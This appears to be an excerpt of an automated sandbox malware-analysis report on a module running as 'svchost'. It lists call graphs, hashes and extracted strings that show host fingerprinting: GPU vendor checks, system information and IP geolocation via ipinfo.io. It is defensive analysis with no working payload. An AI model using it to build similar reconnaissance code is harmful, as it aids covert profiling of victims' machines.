7ffa2cf0c3ed InitializeCriticalSection 127421->127424 127423->127421 127423->127423 127424->127418 127425->127416 127426 64943aa0 127444 64943520 127426->127444 127428 64943ab4 127429 64943ab8 127428->127429 127448 649432a0 8 API calls 127428->127448 127431 64943b6d 127454 64943360 __iob_func 127431->127454 127433 64943ba5 127434 64943ad0 127434->127431 127449 649452f0 24 API calls 127434->127449 127436 64943b2c 127450 649452f0 24 API calls 127436->127450 127439 64943b3c 127440 64943b68 127439->127440 127441 64943b82 127439->127441 127451 64942600 55 API calls 127439->127451 127452 649452f0 24 API calls 127440->127452 127453 649452f0 24 API calls 127441->127453 127445 64943570 127444->127445 127447 6494352f 127444->127447 127455 649434c0 127445->127455 127447->127428 127448->127434 127449->127436 127450->127439 127451->127439 127452->127431 127453->127431 127454->127433 127456 649434d4 127455->127456 127458 649434da 127456->127458 127460 649433e0 127456->127460 127458->127447 127459 649434fb 127459->127447 127462 64943408 127460->127462 127461 64943464 127461->127459 127462->127461 127463 64943480 127462->127463 127464 64943453 127462->127464 127471 64943070 CloseHandle 127463->127471 127464->127461 127466 649434a0 127464->127466 127472 64943070 CloseHandle 127466->127472 127468 649434a8 127473 64943070 CloseHandle 127468->127473 127470 649434b0 127470->127461 127471->127461 127472->127468 127473->127470 127474 7ffa417e50b0 127475 7ffa417e50e3 127474->127475 127483 7ffa417e513b 127475->127483 127484 7ffa417e6140 127475->127484 127477 7ffa418518b0 DName::DName 8 API calls 127479 7ffa417e51a9 127477->127479 127478 7ffa417e5106 127480 7ffa417e5126 127478->127480 127478->127483 127494 7ffa41869704 127478->127494 127480->127483 127502 7ffa41868cf0 127480->127502 127483->127477 127485 7ffa417e6163 127484->127485 127486 7ffa417e6212 127484->127486 127485->127486 127492 7ffa417e616d 127485->127492 127487 7ffa418518b0 DName::DName 8 API calls 127486->127487 127488 7ffa417e6221 127487->127488 127488->127478 127489 7ffa418518b0 DName::DName 8 API calls 127490 7ffa417e61ce 127489->127490 127490->127478 127491 7ffa417e61b1 127491->127489 127492->127491 127511 7ffa41868c4c 104 API calls _invalid_parameter_noinfo 127492->127511 127495 7ffa41869734 127494->127495 127512 7ffa41869480 127495->127512 127498 7ffa41869772 127501 7ffa41869787 127498->127501 127524 7ffa418629f0 102 API calls 2 library calls 127498->127524 127501->127480 127503 7ffa41868d19 127502->127503 127504 7ffa41868d04 127502->127504 127503->127504 127506 7ffa41868d1e 127503->127506 127535 7ffa41866668 13 API calls memcpy_s 127504->127535 127527 7ffa4187a1ac 127506->127527 127507 7ffa41868d09 127536 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127507->127536 127509 7ffa41868d14 127509->127483 127511->127491 127513 7ffa418694ea 127512->127513 127514 7ffa418694aa 127512->127514 127513->127514 127516 7ffa418694f6 127513->127516 127526 7ffa41866c40 102 API calls 2 library calls 127514->127526 127525 7ffa418688b0 EnterCriticalSection 127516->127525 127517 7ffa418694d1 127517->127498 127523 7ffa418629f0 102 API calls 2 library calls 127517->127523 127519 7ffa418694fb 127520 7ffa41869618 102 API calls 127519->127520 127521 7ffa4186950d 127520->127521 127522 7ffa418688bc __std_fs_directory_iterator_open LeaveCriticalSection 127521->127522 127522->127517 127523->127498 127524->127501 127526->127517 127528 7ffa4187a1dc 127527->127528 127537 7ffa41879cb4 127528->127537 127532 7ffa4187a21b 127533 7ffa4187a230 127532->127533 127548 7ffa418629f0 102 API calls 2 library calls 127532->127548 127533->127509 127535->127507 127536->127509 127538 7ffa41879ccf 127537->127538 127539 7ffa41879cfe 127537->127539 127550 7ffa41866c40 102 API calls 2 library calls 127538->127550 127549 7ffa418688b0 EnterCriticalSection 127539->127549 127542 7ffa41879cef 127542->127532 127547 7ffa418629f0 102 API calls 2 library calls 127542->127547 127543 7ffa41879d03 127544 7ffa41879d20 103 API calls 127543->127544 127545 7ffa41879d0f 127544->127545 127546 7ffa418688bc __std_fs_directory_iterator_open LeaveCriticalSection 127545->127546 127546->127542 127547->127532 127548->127533 127550->127542 127551 7ffa417e6430 127570 7ffa417c89c0 127551->127570 127558 7ffa417e65a3 127598 7ffa417e6230 102 API calls DName::DName 127558->127598 127560 7ffa417e65b4 127599 7ffa417e6a10 131 API calls 5 library calls 127560->127599 127561 7ffa417e6614 127568 7ffa417e65d2 127561->127568 127600 7ffa417c38a0 104 API calls 3 library calls 127561->127600 127564 7ffa417e667e 127601 7ffa41853f98 RtlPcToFileHeader RaiseException 127564->127601 127566 7ffa417e668f 127602 7ffa417cacf0 127566->127602 127569 7ffa417e66c1 127571 7ffa418518d8 std::_Facet_Register 104 API calls 127570->127571 127572 7ffa417c8a1c 127571->127572 127616 7ffa4184f0e0 127572->127616 127576 7ffa417c8aa6 127578 7ffa417c8ab3 127576->127578 127644 7ffa4184f3ac 104 API calls 2 library calls 127576->127644 127585 7ffa417c86d0 127578->127585 127580 7ffa417c8ace 127645 7ffa417c38a0 104 API calls 3 library calls 127580->127645 127582 7ffa417c8b0e 127646 7ffa41853f98 RtlPcToFileHeader RaiseException 127582->127646 127584 7ffa417c8b1f 127586 7ffa418518d8 std::_Facet_Register 104 API calls 127585->127586 127587 7ffa417c8747 127586->127587 127588 7ffa4184f0e0 107 API calls 127587->127588 127589 7ffa417c8757 127588->127589 127590 7ffa418508d0 127589->127590 127591 7ffa41850916 127590->127591 127597 7ffa417e659e 127591->127597 127661 7ffa4187118c 127591->127661 127597->127558 127597->127561 127598->127560 127599->127568 127600->127564 127601->127566 127603 7ffa417cae16 127602->127603 127606 7ffa417cad16 127602->127606 127604 7ffa417c2d20 std::_Throw_Cpp_error 104 API calls 127603->127604 127605 7ffa417cae1c 127604->127605 127607 7ffa417cae10 127606->127607 127608 7ffa417cadce 127606->127608 127609 7ffa417cad7a 127606->127609 127613 7ffa417cad21 ctype 127606->127613 127862 7ffa417c2c80 104 API calls 2 library calls 127607->127862 127611 7ffa418518d8 std::_Facet_Register 104 API calls 127608->127611 127609->127607 127612 7ffa418518d8 std::_Facet_Register 104 API calls 127609->127612 127611->127613 127614 7ffa417cad8f 127612->127614 127613->127569 127614->127613 127615 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127614->127615 127615->127607 127647 7ffa4184eb2c 127616->127647 127618 7ffa4184f102 127624 7ffa4184f125 ctype 127618->127624 127655 7ffa4184f2d8 104 API calls std::_Facet_Register 127618->127655 127620 7ffa4184f11a 127656 7ffa4184f308 103 API calls std::locale::_Setgloballocale 127620->127656 127623 7ffa417c8a2c 127625 7ffa417c8e70 127623->127625 127624->127624 127651 7ffa4184eba4 127624->127651 127626 7ffa4184eb2c std::_Lockit::_Lockit 103 API calls 127625->127626 127627 7ffa417c8ea0 127626->127627 127628 7ffa4184eb2c std::_Lockit::_Lockit 103 API calls 127627->127628 127633 7ffa417c8eef 127627->127633 127630 7ffa417c8ec5 127628->127630 127629 7ffa417c8f3c 127631 7ffa4184eba4 std::_Lockit::~_Lockit LeaveCriticalSection 127629->127631 127634 7ffa4184eba4 std::_Lockit::~_Lockit LeaveCriticalSection 127630->127634 127632 7ffa417c8f80 127631->127632 127635 7ffa418518b0 DName::DName 8 API calls 127632->127635 127633->127629 127658 7ffa417c3590 137 API calls 6 library calls 127633->127658 127634->127633 127636 7ffa417c8a56 127635->127636 127636->127576 127636->127580 127638 7ffa417c8f4e 127639 7ffa417c8fa3 127638->127639 127640 7ffa417c8f54 127638->127640 127660 7ffa417c32f0 104 API calls 2 library calls 127639->127660 127659 7ffa4184f0a0 104 API calls std::_Facet_Register 127640->127659 127643 7ffa417c8fa8 127644->127578 127645->127582 127646->127584 127648 7ffa4184eb3b 127647->127648 127649 7ffa4184eb40 127647->127649 127657 7ffa41870508 103 API calls std::_Lockit::_Lockit 127648->127657 127649->127618 127652 7ffa4184ebaf LeaveCriticalSection 127651->127652 127653 7ffa4184ebb8 127651->127653 127653->127623 127655->127620 127656->127624 127658->127638 127659->127629 127660->127643 127662 7ffa418710c0 127661->127662 127663 7ffa418710e6 127662->127663 127666 7ffa41871119 127662->127666 127708 7ffa41866668 13 API calls memcpy_s 127663->127708 127665 7ffa418710eb 127709 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127665->127709 127668 7ffa4187111f 127666->127668 127669 7ffa4187112c 127666->127669 127710 7ffa41866668 13 API calls memcpy_s 127668->127710 127696 7ffa418798f0 127669->127696 127673 7ffa41850949 127673->127597 127680 7ffa4186979c 127673->127680 127674 7ffa41871140 127711 7ffa41866668 13 API calls memcpy_s 127674->127711 127675 7ffa4187114d 127703 7ffa4187d964 127675->127703 127678 7ffa41871160 __std_fs_directory_iterator_open 127712 7ffa418688bc LeaveCriticalSection 127678->127712 127681 7ffa418697cc 127680->127681 127682 7ffa41869480 102 API calls 127681->127682 127683 7ffa418697e8 127682->127683 127684 7ffa4186980d 127683->127684 127846 7ffa418629f0 102 API calls 2 library calls 127683->127846 127687 7ffa41850964 127684->127687 127847 7ffa418629f0 102 API calls 2 library calls 127684->127847 127687->127597 127688 7ffa418684e0 127687->127688 127689 7ffa41868510 127688->127689 127848 7ffa418683bc 127689->127848 127691 7ffa41868529 127692 7ffa4186854e 127691->127692 127858 7ffa418629f0 102 API calls 2 library calls 127691->127858 127695 7ffa41868563 127692->127695 127859 7ffa418629f0 102 API calls 2 library calls 127692->127859 127695->127597 127713 7ffa41870498 EnterCriticalSection 127696->127713 127698 7ffa41879907 127699 7ffa41879964 __std_fs_directory_iterator_open 15 API calls 127698->127699 127700 7ffa41879912 127699->127700 127701 7ffa418704ec __crtLCMapStringW LeaveCriticalSection 127700->127701 127702 7ffa41871136 127701->127702 127702->127674 127702->127675 127714 7ffa4187c680 127703->127714 127706 7ffa4187d9bc 127706->127678 127708->127665 127709->127673 127710->127673 127711->127673 127715 7ffa4187c6bb __vcrt_FlsGetValue 127714->127715 127716 7ffa4187c882 127715->127716 127729 7ffa418840ec 102 API calls 4 library calls 127715->127729 127720 7ffa4187c88b 127716->127720 127732 7ffa41866668 13 API calls memcpy_s 127716->127732 127718 7ffa4187c959 127733 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127718->127733 127720->127706 127726 7ffa41885580 127720->127726 127722 7ffa4187c8ed 127722->127716 127730 7ffa418840ec 102 API calls 4 library calls 127722->127730 127724 7ffa4187c90c 127724->127716 127731 7ffa418840ec 102 API calls 4 library calls 127724->127731 127734 7ffa41884b50 127726->127734 127729->127722 127730->127724 127731->127716 127732->127718 127733->127720 127735 7ffa41884b67 127734->127735 127736 7ffa41884b85 127734->127736 127789 7ffa41866668 13 API calls memcpy_s 127735->127789 127736->127735 127738 7ffa41884ba1 127736->127738 127745 7ffa4188516c 127738->127745 127739 7ffa41884b6c 127790 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127739->127790 127743 7ffa41884b78 127743->127706 127792 7ffa41884e94 127745->127792 127748 7ffa418851df 127824 7ffa41866644 13 API calls memcpy_s 127748->127824 127749 7ffa418851f7 127812 7ffa418839dc 127749->127812 127753 7ffa418851e4 127825 7ffa41866668 13 API calls memcpy_s 127753->127825 127781 7ffa41884bcc 127781->127743 127791 7ffa418839b4 LeaveCriticalSection 127781->127791 127789->127739 127790->127743 127793 7ffa41884ece 127792->127793 127800 7ffa41884ee8 127792->127800 127793->127800 127837 7ffa41866668 13 API calls memcpy_s 127793->127837 127795 7ffa41884edd 127838 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127795->127838 127797 7ffa41884fb1 127811 7ffa41885013 127797->127811 127843 7ffa41883f8c 102 API calls 2 library calls 127797->127843 127798 7ffa41884f60 127798->127797 127841 7ffa41866668 13 API calls memcpy_s 127798->127841 127800->127798 127839 7ffa41866668 13 API calls memcpy_s 127800->127839 127802 7ffa41884fa6 127842 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127802->127842 127804 7ffa4188500f 127805 7ffa41885091 127804->127805 127804->127811 127844 7ffa41866d48 17 API calls __std_fs_directory_iterator_open 127805->127844 127807 7ffa41884f55 127840 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127807->127840 127811->127748 127811->127749 127845 7ffa41870498 EnterCriticalSection 127812->127845 127824->127753 127825->127781 127837->127795 127838->127800 127839->127807 127840->127798 127841->127802 127842->127797 127843->127804 127846->127684 127847->127687 127849 7ffa418683d7 127848->127849 127851 7ffa41868405 127848->127851 127861 7ffa41866c40 102 API calls 2 library calls 127849->127861 127852 7ffa418683f7 __std_fs_directory_iterator_open 127851->127852 127860 7ffa418688b0 EnterCriticalSection 127851->127860 127852->127691 127854 7ffa4186841c 127855 7ffa41868438 102 API calls 127854->127855 127856 7ffa41868428 127855->127856 127857 7ffa418688bc __std_fs_directory_iterator_open LeaveCriticalSection 127856->127857 127857->127852 127858->127692 127859->127695 127861->127852 127862->127603 127863 7ffa417e6330 127864 7ffa417e639a 127863->127864 127865 7ffa417e634a 127863->127865 127866 7ffa417e6140 104 API calls 127865->127866 127867 7ffa417e6384 127866->127867 127868 7ffa418684e0 102 API calls 127867->127868 127868->127864

            Executed Functions

            Function 00007FFA417EBFA0 Relevance: 85.1, APIs: 33, Strings: 15, Instructions: 1105COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$Session$ActiveComputerConcurrency::cancel_current_taskConsoleCreateFactoryFreeInformationMemoryNamePowerQueryStatusSystem
            • String ID: )$045012$G$N/A$N/A$N/A$N/A$N/A$city$country$hardware_manager::download_json_error: {}$https://ipinfo.io/json$region$user${}-{}
            • API String ID: 1169071619-3347492713
            • Opcode ID: da2ba496f3eb7d9b46214e740186fd5aeb5a1fd6f66b29666b694183b68a7d38
            • Instruction ID: 2a7e141e68c1116689a0419be91056af1d6c47e915ccecd4cfb5486c54cbfd3a
            • Opcode Fuzzy Hash: da2ba496f3eb7d9b46214e740186fd5aeb5a1fd6f66b29666b694183b68a7d38
            • Instruction Fuzzy Hash: 74C2A772A1C7C580EB62EB24E4443EE6361EB96794F50D232D69D16ABADF7CD0C4CB04
            Function 00007FFA417F0B90 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 457COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 663 7ffa417f0b90-7ffa417f0bd9 664 7ffa417f0bdf-7ffa417f0c7d call 7ffa41887af0 663->664 665 7ffa417f0fbd-7ffa417f1004 call 7ffa417f63e0 663->665 673 7ffa417f0c92-7ffa417f0d0d call 7ffa417f20c0 call 7ffa417f3b90 call 7ffa417f4060 664->673 674 7ffa417f0c7f-7ffa417f0c8b 664->674 669 7ffa417f1009-7ffa417f101b call 7ffa417f2270 665->669 675 7ffa417f11a2-7ffa417f11a9 669->675 676 7ffa417f1021-7ffa417f10a5 call 7ffa417c53f0 call 7ffa417f1a70 call 7ffa417f6130 call 7ffa417f1f90 669->676 711 7ffa417f0d23-7ffa417f0d44 call 7ffa417f4f20 call 7ffa417f2270 673->711 712 7ffa417f0d0f-7ffa417f0d1f 673->712 674->673 677 7ffa417f1240-7ffa417f124a 675->677 678 7ffa417f11af-7ffa417f1208 call 7ffa417f20c0 call 7ffa417efa30 * 3 call 7ffa417efba0 675->678 719 7ffa417f12eb-7ffa417f1307 call 7ffa417efae0 call 7ffa41853f98 676->719 720 7ffa417f10ab-7ffa417f10b3 676->720 681 7ffa417f1280-7ffa417f1283 call 7ffa417efa30 677->681 682 7ffa417f124c-7ffa417f1264 677->682 696 7ffa417f1288-7ffa417f12b5 call 7ffa418518b0 678->696 744 7ffa417f120a-7ffa417f1222 678->744 681->696 687 7ffa417f1266-7ffa417f1279 682->687 688 7ffa417f127b call 7ffa418518d0 682->688 687->688 693 7ffa417f12b6-7ffa417f12bb call 7ffa41866d18 687->693 688->681 709 7ffa417f12bc-7ffa417f12d8 call 7ffa417efae0 call 7ffa41853f98 693->709 740 7ffa417f12d9-7ffa417f12de call 7ffa41866d18 709->740 741 7ffa417f0eda-7ffa417f0ee1 711->741 742 7ffa417f0d4a-7ffa417f0dd1 call 7ffa417c53f0 call 7ffa417f1a70 call 7ffa417f6130 call 7ffa417f1f90 711->742 712->711 738 7ffa417f1308-7ffa417f130d call 7ffa41866d18 719->738 725 7ffa417f10e6-7ffa417f1121 call 7ffa41853a0c * 2 720->725 726 7ffa417f10b5-7ffa417f10c6 720->726 769 7ffa417f1154-7ffa417f116e 725->769 770 7ffa417f1123-7ffa417f1134 725->770 731 7ffa417f10c8-7ffa417f10db 726->731 732 7ffa417f10e1 call 7ffa418518d0 726->732 731->732 731->738 732->725 766 7ffa417f130e-7ffa417f1313 call 7ffa41866d18 738->766 767 7ffa417f12df-7ffa417f12e4 call 7ffa41866d18 740->767 748 7ffa417f0f45-7ffa417f0f48 741->748 749 7ffa417f0ee3-7ffa417f0f40 call 7ffa417f20c0 call 7ffa417efa30 * 3 call 7ffa417efba0 call 7ffa417f1870 741->749 742->709 806 7ffa417f0dd7-7ffa417f0ddf 742->806 745 7ffa417f1239-7ffa417f123e call 7ffa418518d0 744->745 746 7ffa417f1224-7ffa417f1237 744->746 745->696 746->693 746->745 755 7ffa417f0fac-7ffa417f0fb8 call 7ffa417f1870 748->755 756 7ffa417f0f4a-7ffa417f0fab call 7ffa417f20c0 call 7ffa417efa30 * 4 call 7ffa417efba0 748->756 749->696 755->681 756->755 788 7ffa417f1314-7ffa417f1319 call 7ffa41866d18 766->788 792 7ffa417f12e5-7ffa417f12ea call 7ffa41866d18 767->792 769->675 779 7ffa417f1170-7ffa417f1182 769->779 777 7ffa417f1136-7ffa417f1149 770->777 778 7ffa417f114f call 7ffa418518d0 770->778 777->766 777->778 778->769 780 7ffa417f1184-7ffa417f1197 779->780 781 7ffa417f119d call 7ffa418518d0 779->781 780->781 780->788 781->675 792->719 807 7ffa417f0e12-7ffa417f0e59 call 7ffa41853a0c * 2 806->807 808 7ffa417f0de1-7ffa417f0df2 806->808 825 7ffa417f0e94-7ffa417f0ea6 807->825 826 7ffa417f0e5b-7ffa417f0e6c 807->826 811 7ffa417f0df4-7ffa417f0e07 808->811 812 7ffa417f0e0d call 7ffa418518d0 808->812 811->740 811->812 812->807 825->741 829 7ffa417f0ea8-7ffa417f0eba 825->829 827 7ffa417f0e87-7ffa417f0e8c call 7ffa418518d0 826->827 828 7ffa417f0e6e-7ffa417f0e81 826->828 827->825 828->767 828->827 830 7ffa417f0ed5 call 7ffa418518d0 829->830 831 7ffa417f0ebc-7ffa417f0ecf 829->831 830->741 831->792 831->830
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
            • String ID: value
            • API String ID: 1346393832-494360628
            • Opcode ID: 0816d9e1896b3f9fc9ea7fdf20b84dc6e86ff0960a0f31aeb31d4fe3566e61fe
            • Instruction ID: 4ca1fb156194c934ee6041d529e2165990a4157fb330b9b238857d8226929674
            • Opcode Fuzzy Hash: 0816d9e1896b3f9fc9ea7fdf20b84dc6e86ff0960a0f31aeb31d4fe3566e61fe
            • Instruction Fuzzy Hash: 6B22A162A1CBC144EB13EF35D4403EE6761EB97798F509231EA9D46AEBDF28E180C744
            Function 00007FFA417ED720 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 329COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 891 7ffa417ed720-7ffa417ed7ab call 7ffa417cacf0 CreateDXGIFactory 894 7ffa417ed866-7ffa417ed88a 891->894 895 7ffa417ed7b1-7ffa417ed7e4 call 7ffa417cacf0 891->895 899 7ffa417edaa5-7ffa417edaad 894->899 900 7ffa417ed890-7ffa417ed892 894->900 901 7ffa417ed7e6-7ffa417ed7f1 895->901 902 7ffa417ed7f2-7ffa417ed7fa 895->902 905 7ffa417edaaf-7ffa417edaba 899->905 906 7ffa417edabb-7ffa417edaee 899->906 907 7ffa417ed899-7ffa417ed8aa 900->907 908 7ffa417ed894 900->908 901->902 903 7ffa417ed833-7ffa417ed865 call 7ffa418518b0 902->903 904 7ffa417ed7fc-7ffa417ed813 902->904 909 7ffa417ed815-7ffa417ed828 904->909 910 7ffa417ed82e call 7ffa418518d0 904->910 905->906 912 7ffa417edaf0-7ffa417edafb 906->912 913 7ffa417edaff-7ffa417edb03 906->913 924 7ffa417ed8b1-7ffa417ed8ce 907->924 925 7ffa417ed8ac 907->925 914 7ffa417eda69-7ffa417eda71 908->914 909->910 916 7ffa417edc7e-7ffa417edc83 call 7ffa41866d18 909->916 910->903 912->913 913->903 920 7ffa417edb09-7ffa417edb20 913->920 921 7ffa417eda73-7ffa417eda7e 914->921 922 7ffa417eda7f-7ffa417eda9f 914->922 935 7ffa417edc84-7ffa417edc89 call 7ffa41866d18 916->935 920->910 928 7ffa417edb26-7ffa417edb39 920->928 921->922 922->899 922->900 930 7ffa417ed8d0-7ffa417ed8d9 924->930 925->914 928->916 932 7ffa417edb3f 928->932 930->930 934 7ffa417ed8db-7ffa417ed8f1 call 7ffa417cacf0 930->934 932->910 940 7ffa417ed8f3-7ffa417ed90a 934->940 941 7ffa417ed92a-7ffa417ed98e call 7ffa417ca960 934->941 942 7ffa417ed925 call 7ffa418518d0 940->942 943 7ffa417ed90c-7ffa417ed91f 940->943 949 7ffa417edbe4-7ffa417edc0d 941->949 950 7ffa417ed994-7ffa417ed9c2 call 7ffa417ca960 941->950 942->941 943->942 945 7ffa417edc78-7ffa417edc7d call 7ffa41866d18 943->945 945->916 952 7ffa417edc1e-7ffa417edc26 949->952 953 7ffa417edc0f-7ffa417edc1a 949->953 950->949 958 7ffa417ed9c8-7ffa417ed9f6 call 7ffa417ca960 950->958 955 7ffa417edc28-7ffa417edc33 952->955 956 7ffa417edc37-7ffa417edc3b 952->956 953->952 955->956 956->903 959 7ffa417edc41-7ffa417edc58 956->959 958->949 966 7ffa417ed9fc-7ffa417eda2a call 7ffa417ca960 958->966 959->910 963 7ffa417edc5e-7ffa417edc71 959->963 963->935 965 7ffa417edc73 963->965 965->910 969 7ffa417edb44-7ffa417edb75 966->969 970 7ffa417eda30-7ffa417eda5a call 7ffa417ca960 966->970 972 7ffa417edb86-7ffa417edb8e 969->972 973 7ffa417edb77-7ffa417edb82 969->973 970->969 979 7ffa417eda60-7ffa417eda67 970->979 974 7ffa417edb90-7ffa417edb9b 972->974 975 7ffa417edb9f-7ffa417edba3 972->975 973->972 974->975 975->903 978 7ffa417edba9-7ffa417edbc0 975->978 978->910 981 7ffa417edbc6-7ffa417edbd9 978->981 979->914 981->935 982 7ffa417edbdf 981->982 982->910
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$CreateFactory
            • String ID: AMD$ATI$GeForce$N/A$NVIDIA$Radeon
            • API String ID: 2331002265-1787989322
            • Opcode ID: bd840fa218cd44ae74466bc3d8f378f9dbd06d9777ed7b2caf557bde4d6c2f33
            • Instruction ID: abfd1ea887f70fc319b3f57bc25bed68b93a751eaef629342da829209175f3f0
            • Opcode Fuzzy Hash: bd840fa218cd44ae74466bc3d8f378f9dbd06d9777ed7b2caf557bde4d6c2f33
            • Instruction Fuzzy Hash: 5DE18572A1C74585EB12DB65E44076D77B5FB85BA4F108322EAAD43AE9DF7CE080CB04
            Function 00007FFA4188516C Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1071 7ffa4188516c-7ffa418851dd call 7ffa41884e94 1074 7ffa418851df-7ffa418851e8 call 7ffa41866644 1071->1074 1075 7ffa418851f7-7ffa41885201 call 7ffa418839dc 1071->1075 1080 7ffa418851eb-7ffa418851f2 call 7ffa41866668 1074->1080 1081 7ffa4188521c-7ffa41885294 CreateFileW 1075->1081 1082 7ffa41885203-7ffa4188521a call 7ffa41866644 call 7ffa41866668 1075->1082 1093 7ffa4188555e-7ffa4188557e 1080->1093 1085 7ffa4188529a-7ffa418852ad 1081->1085 1086 7ffa41885322 1081->1086 1082->1080 1090 7ffa418852ef-7ffa4188531d GetLastError call 7ffa418665f8 1085->1090 1091 7ffa418852af-7ffa418852b3 1085->1091 1088 7ffa41885325-7ffa41885330 GetFileType 1086->1088 1094 7ffa41885383-7ffa4188538a 1088->1094 1095 7ffa41885332-7ffa4188536d GetLastError call 7ffa418665f8 CloseHandle 1088->1095 1090->1080 1091->1090 1097 7ffa418852b5-7ffa418852ed CreateFileW 1091->1097 1101 7ffa4188538c-7ffa41885390 1094->1101 1102 7ffa41885392-7ffa41885395 1094->1102 1095->1080 1106 7ffa41885373-7ffa4188537e call 7ffa41866668 1095->1106 1097->1088 1097->1090 1104 7ffa4188539b-7ffa418853f0 call 7ffa418838f4 1101->1104 1102->1104 1105 7ffa41885397 1102->1105 1110 7ffa4188540f-7ffa41885442 call 7ffa41884c14 1104->1110 1111 7ffa418853f2-7ffa418853fe call 7ffa418850a8 1104->1111 1105->1104 1106->1080 1118 7ffa41885448-7ffa4188548b 1110->1118 1119 7ffa41885444-7ffa41885446 1110->1119 1111->1110 1117 7ffa41885400 1111->1117 1120 7ffa41885402-7ffa4188540a call 7ffa41879788 1117->1120 1121 7ffa418854ad-7ffa418854b8 1118->1121 1122 7ffa4188548d-7ffa41885491 1118->1122 1119->1120 1120->1093 1123 7ffa418854be-7ffa418854c2 1121->1123 1124 7ffa4188555c 1121->1124 1122->1121 1126 7ffa41885493-7ffa418854a8 1122->1126 1123->1124 1127 7ffa418854c8-7ffa4188550d CloseHandle CreateFileW 1123->1127 1124->1093 1126->1121 1129 7ffa4188550f-7ffa4188553d GetLastError call 7ffa418665f8 call 7ffa41883b1c 1127->1129 1130 7ffa41885542-7ffa41885557 1127->1130 1129->1130 1130->1124
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
            • String ID:
            • API String ID: 1617910340-0
            • Opcode ID: 1ad9dc9591952d91a480d1a508270e3ff6dc2c1a2e41b9bdce3b2d942a2d5182
            • Instruction ID: 367c8f2e9ec7f1d881156b2c106e4707b4e70d32254dfe40a96d09d695dab648
